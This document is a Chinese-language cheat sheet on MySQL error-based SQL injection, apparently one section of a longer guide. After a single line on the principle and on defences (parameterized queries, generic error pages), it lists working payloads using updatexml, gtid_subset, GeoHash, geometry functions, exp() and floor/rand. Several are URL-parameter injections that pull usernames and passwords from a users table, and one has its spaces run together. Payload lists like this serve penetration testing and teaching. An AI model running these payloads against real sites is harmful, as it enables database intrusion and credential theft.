4、报错注入（Error-based）

原理：当应用把数据库错误信息原样回显到页面时，下列函数的报错文本会带出子查询的结果。对应的防御是使用参数化查询，并且对外只返回通用错误提示，把详细错误写入服务端日志。

 

updatexml( ) , concat()

 

mysql> select updatexml(1,concat(0x7e,(select database()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~security~'

 

updatexml( ) , concat_ws()

 

mysql> select updatexml(1,concat_ws(0x5c,0x5c,substr(@@version,1,99)),1);
ERROR 1105 (HY000): XPATH syntax error: '\\5.7.26'

 

 


 

 

gtid_subset( )

 

?id=1' and gtid_subset(concat(0x7e,(select group_concat(password,':',username) from users),0x7e),1) --+

 

gtid_subtract( )

 

?id=1' and gtid_subtract(concat(0x7e,(select group_concat(password,':',username) from users),0x7e),1) --+

 

 


 

 


空间GeoHash函数   需要MySQL > 5.7.0


ST_PointFromGeoHash( )

?id=1' and ST_PointFromGeoHash(version(),1)--+

 

 

 

ST_LatFromGeoHash( )

?id=1' and ST_LatFromGeoHash((select * from(select * from(select(select(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password)from users),0x7e))))a)b))--+

 

 

ST_LongFromGeoHash( )

?id=1' and ST_LongFromGeoHash((select * from(select * from(select(select(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password)from users),0x7e))))a)b))--+

 


 

 

 

几何函数与数学函数 MySQL 5.1 - 5.5.47

geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

 

 

multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

 

 

polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

 

 

or multipolygon()

ormultipolygon((select * from(select * from(select(SELECTGROUP_CONCAT(user,':',password)from manage))asd)asd))--+

 

 

multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

 

 

linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

 

 

multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

 

 

exp()

select * from test where id=1 and exp(~(select * from(select user())a));

 

 


 

 

 

floor() rand() 主键报错

?id=1' and(Select 1 from(Select count(*),concat(user(),floor(rand(14)*2))x from information_schema.tables group by x)a)--+

 

 
